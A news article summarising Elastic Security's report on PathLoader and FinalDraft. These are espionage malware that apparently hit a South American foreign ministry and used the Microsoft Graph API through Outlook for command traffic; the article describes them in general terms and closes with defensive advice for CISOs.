Cybersecurity experts have identified a new threat to organizations, as a group of hackers has developed a sophisticated family of malware that steals data by using Microsoft Outlook as a communications channel through exploiting the Graph API. Elastic Security researchers have revealed that this malicious software has the capability to bypass hashed passwords, making it a significant concern for CISOs around the world.
The origins of this malware can be traced back to an unnamed group targeting the foreign ministry of a South American nation. However, there are also links to cyberattacks on a university in Southeast Asia and telecom companies in the region. The nature of this campaign is described as “well-engineered, highly-capable, novel intrusion set” by the researchers, indicating a level of sophistication not commonly seen in cyber threats.
The attack against the South American country likely began in November of 2024, when Elastic Security detected a series of suspicious endpoint alerts within the Foreign Ministry. The initial point of compromise is still unclear, but the hackers utilized various tactics to navigate through the organization’s IT infrastructure. One method involved using Windows’ certutil application to download files, showcasing their knowledge of operating system vulnerabilities.
According to the report, the primary motive behind these attacks seems to be espionage, with both Windows and Linux versions of the malware being employed. Despite the hackers demonstrating poor campaign management and inconsistent evasion tactics, the potential impact of their activities should not be underestimated.
CISOs are advised to remain vigilant for signs of similar attacks utilizing the techniques employed by this group. The hackers showed a high level of sophistication by using Windows Remote Management’s Remote shell plugin to download files, including executables, configuration files, and log files. This strategy allowed them to execute malicious code under the guise of trusted binaries, posing a significant challenge for organizations trying to defend against such threats.
The malware used by these attackers comprises a loader and a backdoor, each serving specific functions in the data exfiltration process. Pathloader, the lightweight executable, downloads and executes encrypted shellcode from a remote server while employing anti-analysis techniques to avoid detection. FinalDraft, the 64-bit malware, focuses on injecting processes and exfiltrating data to a command and control server, utilizing tools similar to Mimikatz to handle stolen credentials.
One particularly alarming aspect of this malware is its ability to communicate through the Microsoft Graph API, a feature that many cybercriminals are increasingly utilizing to hide their activities. This method allows the malware to capture authentication tokens and potentially evade detection by traditional security measures.
As organizations grapple with the evolving threat landscape, experts recommend deploying detection rules such as those provided by Elastic Security to identify and mitigate the risk of similar attacks. These rules can help defenders spot the presence of PathLoader and FinalDraft on Windows and Linux systems, enabling a proactive response to potential security breaches.
In conclusion, the emergence of this new strain of data-stealing malware highlights the need for organizations to enhance their cybersecurity defenses and stay abreast of the latest threat intelligence. By remaining vigilant and implementing robust security measures, businesses can better protect themselves against advanced cyber threats and safeguard their sensitive data from malicious actors.